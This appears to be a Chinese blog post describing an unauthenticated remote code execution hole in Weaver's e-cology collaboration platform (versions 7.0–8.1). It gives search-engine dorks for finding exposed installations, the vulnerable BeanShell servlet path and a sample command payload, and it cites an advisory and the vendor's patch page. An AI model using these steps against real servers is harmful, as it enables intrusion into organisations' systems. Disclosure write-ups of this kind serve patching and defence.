泛微e-cology系统远程代码执行漏洞

泛微协同管理应用平台(e-cology)是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。

漏洞源于泛微e-cology系统的JAVA Beanshell接口可被未授权访问,攻击者调用该Beanshell接口,可构造特定的HTTP请求绕过泛微本身的安全限制从而远程命令执行。

漏洞影响版本:

e-cology 7.0

e-cology 8.0

e-cology 8.1

漏洞验证:

第1步:搜索e-cology系统

可通过Google或FOFA进行搜索,Google搜索语法:inurl:"/login/Login.jsp?logintype=1"

分享图片

FOFA搜索语法:header="ecology_JSessionId"

分享图片



第2步:访问Beanshell接口

URL路径为:/weaver/bsh.servlet.BshServlet/

分享图片


第3步:执行Payload

在输入框中输入想要执行的Java代码,如:exec("whoami");

分享图片


参考链接
http://www.cnnvd.org.cn/web/bulletin/bulletinById.tag?mkid=160
https://mp.weixin.qq.com/s/vGgFSof6FMRGNPyTzuH2gQ
https://www.weaver.com.cn/cs/securityDownload.asp

相关文章

HashMap是Java中最常用的集合类框架,也是Java语言中非常典型...
在EffectiveJava中的第 36条中建议 用 EnumSet 替代位字段,...
介绍 注解是JDK1.5版本开始引入的一个特性,用于对代码进行说...
介绍 LinkedList同时实现了List接口和Deque接口,也就是说它...
介绍 TreeSet和TreeMap在Java里有着相同的实现,前者仅仅是对...
HashMap为什么线程不安全 put的不安全 由于多线程对HashMap进...